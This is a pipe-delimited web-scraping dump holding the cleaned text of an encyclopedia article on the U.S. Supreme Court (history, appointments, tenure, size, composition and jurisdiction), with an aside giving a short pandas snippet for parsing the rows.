371 372 In contrast, various other countries have a dedicated constitutional court that has original jurisdiction on constitutional claims brought by persons or political institutions; for example, the Federal Constitutional Court of Germany, which can declare a law unconstitutional when challenged. Critics have accused the Court of "slow-walking" important cases relating to former President Donald Trump in order to benefit his election chances in the face of the 2024 United States presidential election. 373 The Court is considering a Presidential immunity claim as part of the Federal prosecution of Donald Trump (election obstruction case). Critics argue that the Court has acted slowly in order to delay this case until after the election. They point out that the Court can move quickly when it wants to, as it did when it disregarded typical procedures in Bush v. Gore, granting the petition on a Saturday, receiving briefs on Sunday, holding oral arguments on Monday, and issuing the final opinion on Tuesday. 373 Author Sonja West, of Slate, argues that the Federal prosecution of Donald Trump (election obstruction case) is of similar importance to Bush v. Gore and should therefore be treated as expeditiously, but the Court seems to be taking the opposite approach. 373 Sometimes draft opinions are deliberately leaked or inadvertently released before they are published. Such releases are often purported to harm the court's reputation. 374 Chief Justice Roberts has previously described leaks as an "egregious breach of trust" that "undermine the integrity of our operations" in reference to the leaked draft opinion for Dobbs v. Jackson Women's Health Organization. 375 In addition to leaks, the Court has sometimes mistakenly released opinions before they are ready to be published. On June 26, 2024, the Court inadvertently posted an opinion for Moyle v. United States to its website that seemed to indicate that the court will temporarily allow abortions in medical emergencies in Idaho. 376 The official opinion was posted the next day, which returned the case to the lower courts without a ruling on the merits. |
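Aside on the output layout: the "215 | ... | ... |" marker that opens the next record suggests the scraped text is stored as pipe-delimited rows of the form row index | listing page | article URL | cleaned text. That four-field layout is an assumption read off this dump, and the names parse_scraped_rows, row_id, source_page, article_url, and text below are illustrative rather than taken from the notebook; with those caveats, a minimal sketch of reading such records back into a pandas DataFrame might look like this:
# Hypothetical sketch: load pipe-delimited scrape records into a DataFrame.
# Assumes four fields per row (index | listing page | article URL | text);
# adjust if your pipeline stores the columns differently.
import pandas as pd
def parse_scraped_rows(raw_rows):
    records = []
    for row in raw_rows:
        # Split on the first three pipes only, so any pipes inside the text survive.
        parts = [part.strip() for part in row.split("|", 3)]
        if len(parts) == 4:
            records.append(parts)
    return pd.DataFrame(records, columns=["row_id", "source_page", "article_url", "text"])
# Example usage with a shortened, made-up record:
sample = ["215 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Supreme_Court_of_the_United_States | The Supreme Court of the United States (SCOTUS) is the highest court..."]
df = parse_scraped_rows(sample)
print(df[["row_id", "article_url"]])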
215 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Supreme_Court_of_the_United_States | The Supreme Court of the United States (SCOTUS) is the highest court in the federal judiciary of the United States. It has ultimate appellate jurisdiction over all U.S. federal court cases, and over state court cases that turn on questions of U.S. constitutional or federal law. It also has original jurisdiction over a narrow range of cases, specifically "all Cases affecting Ambassadors, other public Ministers and Consuls, and those in which a State shall be Party. 2 The court holds the power of judicial review: the ability to invalidate a statute for violating a provision of the Constitution. It is also able to strike down presidential directives for violating either the Constitution or statutory law. 3 Established by Article Three of the United States Constitution, the composition and procedures of the Supreme Court were originally established by the 1st Congress through the Judiciary Act of 1789. The court consists of nine justices: the chief justice of the United States and eight associate justices, and the justices meet at the Supreme Court Building in Washington, D.C. Justices have lifetime tenure, meaning they remain on the court until they die, retire, resign, or are impeached and removed from office. 3 When a vacancy occurs, the president, with the advice and consent of the Senate, appoints a new justice. Each justice has a single vote in deciding the cases argued before the court. When in the majority, the chief justice decides who writes the opinion of the court; otherwise, the most senior justice in the majority assigns the task of writing the opinion. The Supreme Court receives on average about 7,000 petitions for writs of certiorari each year, but grants only about 80. 4 better source needed needs update It was while debating the separation of powers between the legislative and executive departments that delegates to the 1787 Constitutional Convention established the parameters for the national judiciary. Creating a "third branch" of government was a novel idea citation needed ; in the English tradition, judicial matters had been treated as an aspect of royal (executive) authority. Early on, the delegates who were opposed to having a strong central government argued that national laws could be enforced by state courts, while others, including James Madison, advocated for a national judicial authority consisting of tribunals chosen by the national legislature. It was proposed that the judiciary should have a role in checking the executive's power to veto or revise laws. citation needed Eventually, the framers compromised by sketching only a general outline of the judiciary in Article Three of the United States Constitution, vesting federal judicial power in "one supreme Court, and in such inferior Courts as the Congress may from time to time ordain and establish. 5 6 better source needed They delineated neither the exact powers and prerogatives of the Supreme Court nor the organization of the judicial branch as a whole. citation needed The 1st United States Congress provided the detailed organization of a federal judiciary through the Judiciary Act of 1789. The Supreme Court, the country's highest judicial tribunal, was to sit in the nation's capital and would initially be composed of a chief justice and five associate justices. The act also divided the country into judicial districts, which were in turn organized into circuits. 
Justices were required to "ride circuit" and hold circuit court twice a year in their assigned judicial district. 7 non-primary source needed Immediately after signing the act into law, President George Washington nominated the following people to serve on the court: John Jay for chief justice and John Rutledge, William Cushing, Robert H. Harrison, James Wilson, and John Blair Jr. as associate justices. All six were confirmed by the Senate on September 26, 1789; however, Harrison declined to serve, and Washington later nominated James Iredell in his place. 8 non-primary source needed The Supreme Court held its inaugural session from February 2 through February 10, 1790, at the Royal Exchange in New York City, then the U.S. capital. 9 A second session was held there in August 1790. 10 The earliest sessions of the court were devoted to organizational proceedings, as the first cases did not reach it until 1791. 7 When the nation's capital was moved to Philadelphia in 1790, the Supreme Court did so as well. After initially meeting at Independence Hall, the court established its chambers at City Hall. 11 Under chief justices Jay, Rutledge, and Ellsworth (1789 1801), the court heard few cases; its first decision was West v. Barnes (1791), a case involving procedure. 12 As the court initially had only six members, every decision that it made by a majority was also made by two-thirds (voting four to two). 13 However, Congress has always allowed less than the court's full membership to make decisions, starting with a quorum of four justices in 1789. 14 The court lacked a home of its own and had little prestige, 15 a situation not helped by the era's highest-profile case, Chisholm v. Georgia (1793), which was reversed within two years by the adoption of the Eleventh Amendment. 16 The court's power and prestige grew substantially during the Marshall Court (1801 1835). 17 Under Marshall, the court established the power of judicial review over acts of Congress, 18 including specifying itself as the supreme expositor of the Constitution (Marbury v. Madison) 19 20 and making several important constitutional rulings that gave shape and substance to the balance of power between the federal government and states, notably Martin v. Hunter's Lessee, McCulloch v. Maryland, and Gibbons v. Ogden. 21 22 23 24 The Marshall Court also ended the practice of each justice issuing his opinion seriatim, 25 a remnant of British tradition, 26 and instead issuing a single majority opinion. 25 Also during Marshall's tenure, although beyond the court's control, the impeachment and acquittal of Justice Samuel Chase from 1804 to 1805 helped cement the principle of judicial independence. 27 28 The Taney Court (1836 1864) made several important rulings, such as Sheldon v. Sill, which held that while Congress may not limit the subjects the Supreme Court may hear, it may limit the jurisdiction of the lower federal courts to prevent them from hearing cases dealing with certain subjects. 29 Nevertheless, it is primarily remembered for its ruling in Dred Scott v. Sandford, 30 which helped precipitate the American Civil War. 31 In the Reconstruction era, the Chase, Waite, and Fuller Courts (1864 1910) interpreted the new Civil War amendments to the Constitution 24 and developed the doctrine of substantive due process (Lochner v. New York; 32 Adair v. United States). 33 The size of the court was last changed in 1869, when it was set at nine. 
Under the White and Taft Courts (1910 1930), the court held that the Fourteenth Amendment had incorporated some guarantees of the Bill of Rights against the states (Gitlow v. New York), 34 grappled with the new antitrust statutes (Standard Oil Co. of New Jersey v. United States), upheld the constitutionality of military conscription (Selective Draft Law Cases), 35 and brought the substantive due process doctrine to its first apogee (Adkins v. Children's Hospital). 36 During the Hughes, Stone, and Vinson courts (1930 1953), the court gained its own accommodation in 1935 37 and changed its interpretation of the Constitution, giving a broader reading to the powers of the federal government to facilitate President Franklin D. Roosevelt's New Deal (most prominently West Coast Hotel Co. v. Parrish, Wickard v. Filburn, United States v. Darby, and United States v. Butler). 38 39 40 During World War II, the court continued to favor government power, upholding the internment of Japanese Americans (Korematsu v. United States) and the mandatory Pledge of Allegiance (Minersville School District v. Gobitis). Nevertheless, Gobitis was soon repudiated (West Virginia State Board of Education v. Barnette), and the Steel Seizure Case restricted the pro-government trend. The Warren Court (1953 1969) dramatically expanded the force of Constitutional civil liberties. 41 It held that segregation in public schools violates the Equal Protection Clause of the Fourteenth Amendment (Brown v. Board of Education, Bolling v. Sharpe, and Green v. County School Bd.) 42 and that legislative districts must be roughly equal in population (Reynolds v. Sims). It recognized a general right to privacy (Griswold v. Connecticut), 43 limited the role of religion in public school, most prominently Engel v. Vitale and Abington School District v. Schempp, 44 45 incorporated most guarantees of the Bill of Rights against the states, prominently Mapp v. Ohio (the exclusionary rule) and Gideon v. Wainwright (right to appointed counsel), 46 47 and required that criminal suspects be apprised of all these rights by police (Miranda v. Arizona). 48 At the same time, the court limited defamation suits by public figures (New York Times Co. v. Sullivan) and supplied the government with an unbroken run of antitrust victories. 49 The Burger Court (1969 1986) saw a conservative shift. 50 It also expanded Griswold's right to privacy to strike down abortion laws (Roe v. Wade) 51 but divided deeply on affirmative action (Regents of the University of California v. Bakke) 52 and campaign finance regulation (Buckley v. Valeo). 53 It also wavered on the death penalty, ruling first that most applications were defective (Furman v. Georgia), 54 but later that the death penalty itself was not unconstitutional (Gregg v. Georgia). 54 55 56 The Rehnquist Court (1986 2005) was known for its revival of judicial enforcement of federalism, 57 emphasizing the limits of the Constitution's affirmative grants of power (United States v. Lopez) and the force of its restrictions on those powers (Seminole Tribe v. Florida, City of Boerne v. Flores). 58 59 60 61 62 It struck down single-sex state schools as a violation of equal protection (United States v. Virginia), laws against sodomy as violations of substantive due process (Lawrence v. Texas) 63 and the line-item veto (Clinton v. New York) but upheld school vouchers (Zelman v. Simmons-Harris) and reaffirmed Roe's restrictions on abortion laws (Planned Parenthood v. Casey). 64 The court's decision in Bush v. 
Gore, which ended the electoral recount during the 2000 United States presidential election, remains especially controversial with debate ongoing over the rightful winner and whether or not the ruling should set a precedent. 65 66 67 68 The Roberts Court (2005 present) is regarded as more conservative and controversial than the Rehnquist Court. 69 70 71 72 Some of its major rulings have concerned federal preemption (Wyeth v. Levine), civil procedure (Twombly Iqbal), voting rights and federal preclearance (Shelby County), abortion (Gonzales v. Carhart and Dobbs v. Jackson Women's Health Organization), 73 climate change (Massachusetts v. EPA), same-sex marriage (United States v. Windsor and Obergefell v. Hodges), and the Bill of Rights, such as in Citizens United v. Federal Election Commission (First Amendment), 74 Heller McDonald Bruen (Second Amendment), 75 and Baze v. Rees (Eighth Amendment). 76 77 Article II, Section 2, Clause 2 of the United States Constitution, known as the Appointments Clause, empowers the president to nominate and, with the confirmation (advice and consent) of the United States Senate, to appoint public officials, including justices of the Supreme Court. This clause is one example of the system of checks and balances inherent in the Constitution. The president has the plenary power to nominate, while the Senate possesses the plenary power to reject or confirm the nominee. The Constitution sets no qualifications for service as a justice, such as age, citizenship, residence or prior judicial experience, thus a president may nominate anyone to serve, and the Senate may not set any qualifications or otherwise limit who the president can choose. 78 79 80 In modern times, the confirmation process has attracted considerable attention from the press and advocacy groups, which lobby senators to confirm or to reject a nominee depending on whether their track record aligns with the group's views. The Senate Judiciary Committee conducts hearings and votes on whether the nomination should go to the full Senate with a positive, negative or neutral report. The committee's practice of personally interviewing nominees is relatively recent. The first nominee to appear before the committee was Harlan Fiske Stone in 1925, who sought to quell concerns about his links to Wall Street, and the modern practice of questioning began with John Marshall Harlan II in 1955. 81 Once the committee reports out the nomination, the full Senate considers it. Rejections are relatively uncommon; the Senate has explicitly rejected twelve Supreme Court nominees, most recently Robert Bork, nominated by President Ronald Reagan in 1987. Although Senate rules do not necessarily allow a negative or tied vote in committee to block a nomination, prior to 2017 a nomination could be blocked by filibuster once debate had begun in the full Senate. President Lyndon B. Johnson's nomination of sitting associate justice Abe Fortas to succeed Earl Warren as Chief Justice in 1968 was the first successful filibuster of a Supreme Court nominee. It included both Republican and Democratic senators concerned with Fortas's ethics. President Donald Trump's nomination of Neil Gorsuch to the seat left vacant by Antonin Scalia's death was the second. 
Unlike the Fortas filibuster, only Democratic senators voted against cloture on the Gorsuch nomination, citing his perceived conservative judicial philosophy, and the Republican majority's prior refusal to take up President Barack Obama's nomination of Merrick Garland to fill the vacancy. 82 This led the Republican majority to change the rules and eliminate the filibuster for Supreme Court nominations. 83 Not every Supreme Court nominee has received a floor vote in the Senate. A president may withdraw a nomination before an actual confirmation vote occurs, typically because it is clear that the Senate will reject the nominee; this occurred with President George W. Bush's nomination of Harriet Miers in 2005. The Senate may also fail to act on a nomination, which expires at the end of the session. President Dwight Eisenhower's first nomination of John Marshall Harlan II in November 1954 was not acted on by the Senate; Eisenhower re-nominated Harlan in January 1955, and Harlan was confirmed two months later. Most recently, the Senate failed to act on the March 2016 nomination of Merrick Garland, as the nomination expired in January 2017, and the vacancy was filled by Neil Gorsuch, an appointee of President Trump. 84 Once the Senate confirms a nomination, the president must prepare and sign a commission, to which the Seal of the Department of Justice must be affixed, before the appointee can take office. 85 The seniority of an associate justice is based on the commissioning date, not the confirmation or swearing-in date. 86 After receiving their commission, the appointee must then take the two prescribed oaths before assuming their official duties. 87 The importance of the oath taking is underscored by the case of Edwin M. Stanton. Although confirmed by the Senate on December 20, 1869, and duly commissioned as an associate justice by President Ulysses S. Grant, Stanton died on December 24, prior to taking the prescribed oaths. He is not, therefore, considered to have been a member of the court. 88 89 Before 1981, the approval process of justices was usually rapid. From the Truman through Nixon administrations, justices were typically approved within one month. From the Reagan administration to the present, the process has taken much longer and some believe this is because Congress sees justices as playing a more political role than in the past. 90 According to the Congressional Research Service, the average number of days from nomination to final Senate vote since 1975 is 67 days (2.2 months), while the median is 71 days (2.3 months). 91 92 When the Senate is in recess, a president may make temporary appointments to fill vacancies. Recess appointees hold office only until the end of the next Senate session (less than two years). The Senate must confirm the nominee for them to continue serving; of the two chief justices and eleven associate justices who have received recess appointments, only Chief Justice John Rutledge was not subsequently confirmed. 93 No U.S. president since Dwight D. Eisenhower has made a recess appointment to the court, and the practice has become rare and controversial even in lower federal courts. 94 In 1960, after Eisenhower had made three such appointments, the Senate passed a "sense of the Senate" resolution that recess appointments to the court should only be made in "unusual circumstances"; 95 such resolutions are not legally binding but are an expression of Congress's views in the hope of guiding executive action. 
95 96 The Supreme Court's 2014 decision in National Labor Relations Board v. Noel Canning limited the ability of the president to make recess appointments (including appointments to the Supreme Court); the court ruled that the Senate decides when the Senate is in session or in recess. Writing for the court, Justice Breyer stated, "We hold that, for purposes of the Recess Appointments Clause, the Senate is in session when it says it is, provided that, under its own rules, it retains the capacity to transact Senate business." 97 This ruling allows the Senate to prevent recess appointments through the use of pro forma sessions. 98 Lifetime tenure for justices exists only for the US Supreme Court and the State of Rhode Island's Supreme Court; all other democratic nations and all other US states have set term limits or mandatory retirement ages. 99 Larry Sabato wrote: "The insularity of lifetime tenure, combined with the appointments of relatively young attorneys who give long service on the bench, produces senior judges representing the views of past generations better than views of the current day." 100 Sanford Levinson has been critical of justices who stayed in office despite age-related medical deterioration. 101 James MacGregor Burns stated that lifelong tenure has "produced a critical time lag, with the Supreme Court institutionally almost always behind the times." 102 Proposals to solve these problems include term limits for justices, as proposed by Levinson 103 and Sabato, 100 104 and a mandatory retirement age, proposed by Richard Epstein, 105 among others. 106 Alexander Hamilton, in Federalist No. 78, argued that one benefit of lifetime tenure was that "nothing can contribute so much to its firmness and independence as permanency in office." 107 Article Three, Section 1 of the Constitution provides that justices "shall hold their offices during good behavior", which is understood to mean that they may serve for the remainder of their lives, until death; furthermore, the phrase is generally interpreted to mean that the only way justices can be removed from office is by Congress via the impeachment process. The Framers of the Constitution chose good behavior tenure to limit the power to remove justices and to ensure judicial independence. 108 109 110 No constitutional mechanism exists for removing a justice who is permanently incapacitated by illness or injury, but unable (or unwilling) to resign. 111 The only justice ever to be impeached was Samuel Chase, in 1804. The House of Representatives adopted eight articles of impeachment against him; however, he was acquitted by the Senate and remained in office until his death in 1811. 112 Two justices, William O. Douglas and Abe Fortas, were subjected to hearings by the Judiciary Committee: Douglas was the subject of hearings twice, in 1953 and again in 1970, and Fortas resigned while hearings were being organized in 1969. On July 10, 2024, Representative Alexandria Ocasio-Cortez filed Articles of Impeachment against Justices Clarence Thomas and Samuel Alito, citing their "widely documented financial and personal entanglements." 113 Because justices have indefinite tenure, the timing of vacancies can be unpredictable. Sometimes they arise in quick succession, as in September 1971, when Hugo Black and John Marshall Harlan II left within days of each other, the shortest period of time between vacancies in the court's history. 
114 Sometimes a great length of time passes between vacancies, such as the 11 year span, from 1994 to 2005, from the retirement of Harry Blackmun to the death of William Rehnquist, which was the second longest timespan between vacancies in the court's history. 115 On average a new justice joins the court about every two years. 116 Despite the variability, all but four presidents have been able to appoint at least one justice. William Henry Harrison died a month after taking office, although his successor (John Tyler) made an appointment during that presidential term. Likewise, Zachary Taylor died 16 months after taking office, but his successor (Millard Fillmore) also made a Supreme Court nomination before the end of that term. Andrew Johnson, who became president after the assassination of Abraham Lincoln, was denied the opportunity to appoint a justice by a reduction in the size of the court. Jimmy Carter is the only person elected president to have left office after at least one full term without having the opportunity to appoint a justice. Presidents James Monroe, Franklin D. Roosevelt, and George W. Bush each served a full term without an opportunity to appoint a justice, but made appointments during their subsequent terms in office. No president who has served more than one full term has gone without at least one opportunity to make an appointment. One of the smallest Supreme Courts in the world, the US Supreme Court consists of nine members: one chief justice and eight associate justices. The U.S. Constitution does not specify the size of the Supreme Court, nor does it specify any specific positions for the court's members. The Constitution assumes the existence of the office of the chief justice, because it mentions in Article I, Section 3, Clause 6 that "the Chief Justice" must preside over impeachment trials of the President of the United States. The power to define the Supreme Court's size and membership has been assumed to belong to Congress, which initially established a six-member Supreme Court composed of a chief justice and five associate justices through the Judiciary Act of 1789. The size of the court was first altered by the Midnight Judges Act of 1801 which would have reduced the size of the court to five members upon its next vacancy (as federal judges have life tenure), but the Judiciary Act of 1802 promptly negated the 1801 act, restoring the court's size to six members before any such vacancy occurred. As the nation's boundaries grew across the continent and as Supreme Court justices in those days had to ride the circuit, an arduous process requiring long travel on horseback or carriage over harsh terrain that resulted in months-long extended stays away from home, Congress added justices to correspond with the growth such that the number of seats for associate justices plus the chief justice became seven in 1807, nine in 1837, and ten in 1863. 117 118 At the behest of Chief Justice Chase, and in an attempt by the Republican Congress to limit the power of Democrat Andrew Johnson, Congress passed the Judicial Circuits Act of 1866, providing that the next three justices to retire would not be replaced, which would thin the bench to seven justices by attrition. Consequently, one seat was removed in 1866 and a second in 1867. Soon after Johnson left office, the new president Ulysses S. Grant, 119 a Republican, signed into law the Judiciary Act of 1869. 
This returned the number of justices to nine 120 (where it has since remained), and allowed Grant to immediately appoint two more judges. President Franklin D. Roosevelt attempted to expand the court in 1937. His proposal envisioned the appointment of one additional justice for each incumbent justice who reached the age of 70 years 6 months and refused retirement, up to a maximum bench of 15 justices. The proposal was ostensibly to ease the burden of the docket on elderly judges, but the actual purpose was widely understood as an effort to "pack" the court with justices who would support Roosevelt's New Deal. 121 The plan, usually called the "court-packing plan", failed in Congress after members of Roosevelt's own Democratic Party believed it to be unconstitutional. It was defeated 70 20 in the Senate, and the Senate Judiciary Committee reported that it was "essential to the continuance of our constitutional democracy" that the proposal "be so emphatically rejected that its parallel will never again be presented to the free representatives of the free people of America. 122 123 124 125 The expansion of a 5 4 conservative majority to a 6 3 supermajority during the presidency of Donald Trump led to analysts calling the court the most conservative since the 1930s as well as calls for an expansion in the court's size to fix what some saw as an imbalance, with Republicans having appointed 14 of the 18 justices immediately preceding Amy Coney Barrett. 126 127 In April 2021, during the 117th Congress, some Democrats in the House of Representatives introduced the Judiciary Act of 2021, a bill to expand the Supreme Court from nine to 13 seats. It met divided views within the party, and Speaker of the House Nancy Pelosi did not bring it to the floor for a vote. 128 129 Shortly after taking office in January 2021, President Joe Biden established a presidential commission to study possible reforms to the Supreme Court. The commission's December 2021 final report discussed but took no position on expanding the size of the court. 130 At nine members, the U.S. Supreme Court is one of the smallest supreme courts in the world. David Litt argues the court is too small to represent the perspectives of a country the United States' size. 131 Lawyer and legal scholar Jonathan Turley advocates for 19 justices, with the court being gradually expanded by two new members per presidential term, bringing the U.S. Supreme Court to a similar size as its counterparts in other developed countries. He says that a bigger court would reduce the power of the swing justice, ensure the court has "a greater diversity of views", and make confirmation of new justices less politically contentious. 132 133 There are currently nine justices on the Supreme Court: Chief Justice John Roberts and eight associate justices. Among the current members of the court, Clarence Thomas is the longest-serving justice, with a tenure of 11,987 days (32 years, 299 days) as of August 17, 2024; the most recent justice to join the court is Ketanji Brown Jackson, whose tenure began on June 30, 2022, after being confirmed by the Senate on April 7. 134 This graphical timeline depicts the length of each current Supreme Court justice's tenure (not seniority, as the chief justice has seniority over all associate justices regardless of tenure) on the court: The court currently has five male and four female justices. Among the nine justices, there are two African American justices (Justices Thomas and Jackson) and one Hispanic justice (Justice Sotomayor). 
One of the justices was born to at least one immigrant parent: Justice Alito's father was born in Italy. 136 137 At least six justices are Roman Catholics, one is Jewish, and one is Protestant. It is unclear whether Neil Gorsuch considers himself a Catholic or an Episcopalian. 138 Historically, most justices have been Protestants, including 36 Episcopalians, 19 Presbyterians, 10 Unitarians, 5 Methodists, and 3 Baptists. 139 140 The first Catholic justice was Roger Taney in 1836, 141 and 1916 saw the appointment of the first Jewish justice, Louis Brandeis. 142 In recent years, the historical situation has reversed, as most recent justices have been either Catholic or Jewish. Three justices are from the state of New York, two are from Washington, D.C., and one each is from New Jersey, Georgia, Colorado, and Louisiana. 143 144 145 Eight of the current justices received their Juris Doctor from an Ivy League law school: Neil Gorsuch, Ketanji Brown Jackson, Elena Kagan, and John Roberts from Harvard; and Samuel Alito, Brett Kavanaugh, Sonia Sotomayor, and Clarence Thomas from Yale. Only Amy Coney Barrett did not; she received her Juris Doctor at Notre Dame. Previous positions or offices, judicial or federal government, prior to joining the court (by order of seniority following the Chief Justice) include: For much of the court's history, every justice was a man of Northwestern European descent, and almost always Protestant. Diversity concerns focused on geography, to represent all regions of the country, rather than on religious, ethnic, or gender diversity. 146 Racial, ethnic, and gender diversity in the court increased in the late 20th century. Thurgood Marshall became the first African-American justice in 1967. 142 Sandra Day O'Connor became the first female justice in 1981. 142 In 1986, Antonin Scalia became the first Italian-American justice. Marshall was succeeded by African-American Clarence Thomas in 1991. 147 O'Connor was joined by Ruth Bader Ginsburg, the first Jewish woman on the Court, in 1993. 148 After O'Connor's retirement, Ginsburg was joined in 2009 by Sonia Sotomayor, the first Hispanic and Latina justice, 142 and in 2010 by Elena Kagan. 148 After Ginsburg's death on September 18, 2020, Amy Coney Barrett was confirmed as the fifth woman in the court's history on October 26, 2020. Ketanji Brown Jackson is the sixth woman and first African-American woman on the court. There have been six foreign-born justices in the court's history: James Wilson (1789–1798), born in Caskardy, Scotland; James Iredell (1790–1799), born in Lewes, England; William Paterson (1793–1806), born in County Antrim, Ireland; David Brewer (1889–1910), born to American missionaries in Smyrna, Ottoman Empire (now İzmir, Turkey); George Sutherland (1922–1939), born in Buckinghamshire, England; and Felix Frankfurter (1939–1962), born in Vienna, Austria-Hungary (now in Austria). 142 Since 1789, about one-third of the justices have been U.S. military veterans. Samuel Alito is the only veteran currently serving on the court. 149 Retired justices Stephen Breyer and Anthony Kennedy also served in the U.S. military. 150 Justices are nominated by the president in power, and receive confirmation by the Senate, historically holding many of the views of the nominating president's political party. 
While justices do not represent or receive official endorsements from political parties, as is accepted practice in the legislative and executive branches, organizations such as the Federalist Society do officially filter and endorse judges that have a sufficiently conservative view of the law. Jurists are often informally categorized in the media as conservative or liberal. Attempts to quantify the ideologies of jurists include the Segal–Cover score, Martin-Quinn score, and Judicial Common Space score. 151 152 Devins and Baum argue that before 2010, the Court never had clear ideological blocs that fell perfectly along party lines. In choosing their appointments, Presidents often focused more on friendship and political connections than on ideology. Republican presidents sometimes appointed liberals and Democratic presidents sometimes appointed conservatives. As a result, "... between 1790 and early 2010 there were only two decisions that the Guide to the U.S. Supreme Court designated as important and that had at least two dissenting votes in which the Justices divided along party lines, about one-half of one percent." 153 : 316 154 Even in the turbulent 1960s and 1970s, Democratic and Republican elites tended to agree on some major issues, especially concerning civil rights and civil liberties—and so did the justices. But since 1991, they argue, ideology has been much more important in choosing justices—all Republican appointees have been committed conservatives and all Democratic appointees have been liberals. 153 : 331 344 As the more moderate Republican justices retired, the court has become more partisan. The Court became more sharply divided along partisan lines, with justices appointed by Republican presidents taking increasingly conservative positions and those appointed by Democrats taking moderate liberal positions. 153 : 357 Following the confirmation of Amy Coney Barrett in 2020 after the death of Ruth Bader Ginsburg, the court is composed of six justices appointed by Republican presidents and three appointed by Democratic presidents. It is popularly accepted that Chief Justice Roberts and associate justices Thomas, Alito, Gorsuch, Kavanaugh, and Barrett, appointed by Republican presidents, compose the court's conservative wing, and that Justices Sotomayor, Kagan, and Jackson, appointed by Democratic presidents, compose the court's liberal wing. 155 Prior to Justice Ginsburg's death in 2020, the conservative Chief Justice Roberts was sometimes described as the court's 'median justice' (with four justices more liberal and four more conservative than he is). 156 157 Darragh Roche argues that Kavanaugh, as 2021's median justice, exemplifies the rightward shift in the court. 158 FiveThirtyEight found the number of unanimous decisions dropped from the 20-year average of nearly 50% to nearly 30% in 2021, while party-line rulings increased from a 60-year average just above zero to a record high of 21%. 159 That year, Ryan Williams pointed to the party-line votes for confirmations of justices as evidence that the court is of partisan importance to the Senate. 160 In 2022, Simon Lazarus of Brookings critiqued the U.S. Supreme Court as an increasingly partisan institution. 161 A 2024 AP-NORC poll showed 7 in 10 respondents believed the court decides cases to "fit their own ideologies" as opposed to "acting as an independent check on other branches of government by being fair and impartial."
162 There are currently three living retired justices of the Supreme Court of the United States: Anthony Kennedy, David Souter, and Stephen Breyer. As retired justices, they no longer participate in the work of the Supreme Court, but may be designated for temporary assignments to sit on lower federal courts, usually the United States Courts of Appeals. Such assignments are formally made by the chief justice, on request of the chief judge of the lower court and with the consent of the retired justice. In recent years, Justice Souter has frequently sat on the First Circuit, the court of which he was briefly a member before joining the Supreme Court. 163 The status of a retired justice is analogous to that of a circuit or district court judge who has taken senior status, and eligibility of a Supreme Court justice to assume retired status (rather than simply resign from the bench) is governed by the same age and service criteria. In recent times, justices tend to strategically plan their decisions to leave the bench, with personal, institutional, ideological, partisan, and political factors playing a role. 164 165 The fear of mental decline and death often motivates justices to step down. The desire to maximize the court's strength and legitimacy through one retirement at a time, when the court is in recess and during non-presidential election years, suggests a concern for institutional health. Finally, especially in recent decades, many justices have timed their departure to coincide with a philosophically compatible president holding office, to ensure that a like-minded successor would be appointed. 166 167 As of 2024, associate justices receive a yearly salary of $298,500 and the chief justice is paid $312,200 per year. 168 Once a justice meets age and service requirements, the justice may retire with a pension based on the same formula used for federal employees. As with other federal court judges, their pension can never be less than their salary at the time of retirement, according to the Compensation Clause of Article III of the Constitution. For the most part, the day-to-day activities of the justices are governed by rules of protocol based upon the seniority of justices. The chief justice always ranks first in the order of precedence—regardless of the length of their service. The associate justices are then ranked by the length of their service. The chief justice sits in the center on the bench, or at the head of the table during conferences. The other justices are seated in order of seniority. The senior-most associate justice sits immediately to the chief justice's right; the second most senior sits immediately to their left. The seats alternate right to left in order of seniority, with the most junior justice occupying the last seat. Therefore, since the October 2022 term, the court sits as follows from left to right, from the perspective of those facing the court: Barrett, Gorsuch, Sotomayor, Thomas (most senior associate justice), Roberts (chief justice), Alito, Kagan, Kavanaugh, and Jackson. Likewise, when the members of the court gather for official group photographs, justices are arranged in order of seniority, with the five most senior members seated in the front row in the same order as they would sit during Court sessions (currently, from left to right, Sotomayor, Thomas, Roberts, Alito, and Kagan), and the four most junior justices standing behind them, again in the same order as they would sit during Court sessions (Barrett, Gorsuch, Kavanaugh, and Jackson).
In the justices' private conferences, current practice is for them to speak and vote in order of seniority, beginning with the chief justice first and ending with the most junior associate justice. By custom, the most junior associate justice in these conferences is charged with any menial tasks the justices may require as they convene alone, such as answering the door of their conference room, serving beverages and transmitting orders of the court to the clerk. 169 The Supreme Court first met on February 1, 1790, at the Merchants' Exchange Building in New York City. When Philadelphia became the capital, the court met briefly in Independence Hall before settling in Old City Hall from 1791 until 1800. After the government moved to Washington, D.C., the court occupied various spaces in the Capitol building until 1935, when it moved into its own purpose-built home. The four-story building was designed by Cass Gilbert in a classical style sympathetic to the surrounding buildings of the Capitol and Library of Congress, and is clad in marble. The building includes the courtroom, justices' chambers, an extensive law library, various meeting spaces, and auxiliary services including a gymnasium. The Supreme Court building is within the ambit of the Architect of the Capitol, but maintains its own Supreme Court Police, separate from the Capitol Police. 170 Located across First Street from the United States Capitol at One First Street NE and Maryland Avenue, 171 172 the building is open to the public from 9 am to 4:30 pm weekdays but closed on weekends and holidays. 171 Visitors may not tour the actual courtroom unaccompanied. There is a cafeteria, a gift shop, exhibits, and a half-hour informational film. 170 When the court is not in session, lectures about the courtroom are held hourly from 9:30 am to 3:30 pm and reservations are not necessary. 170 When the court is in session the public may attend oral arguments, which are held twice each morning (and sometimes afternoons) on Mondays, Tuesdays, and Wednesdays in two-week intervals from October through late April, with breaks during December and February. Visitors are seated on a first-come first-served basis. One estimate is there are about 250 seats available. 173 The number of open seats varies from case to case; for important cases, some visitors arrive the day before and wait through the night. The court releases opinions beginning at 10 am on scheduled "non-argument days" (also called opinion days) 174 These sessions, which typically last 15 to 30 minute, are also open to the public. 174 170 From mid-May until the end of June, at least one opinion day is scheduled each week. 170 Supreme Court Police are available to answer questions. 171 Congress is authorized by Article III of the federal Constitution to regulate the Supreme Court's appellate jurisdiction. The Supreme Court has original and exclusive jurisdiction over cases between two or more states 175 but may decline to hear such cases. 176 It also possesses original but not exclusive jurisdiction to hear "all actions or proceedings to which ambassadors, other public ministers, consuls, or vice consuls of foreign states are parties; all controversies between the United States and a State; and all actions or proceedings by a State against the citizens of another State or against aliens. 177 In 1906, the court asserted its original jurisdiction to prosecute individuals for contempt of court in United States v. Shipp. 
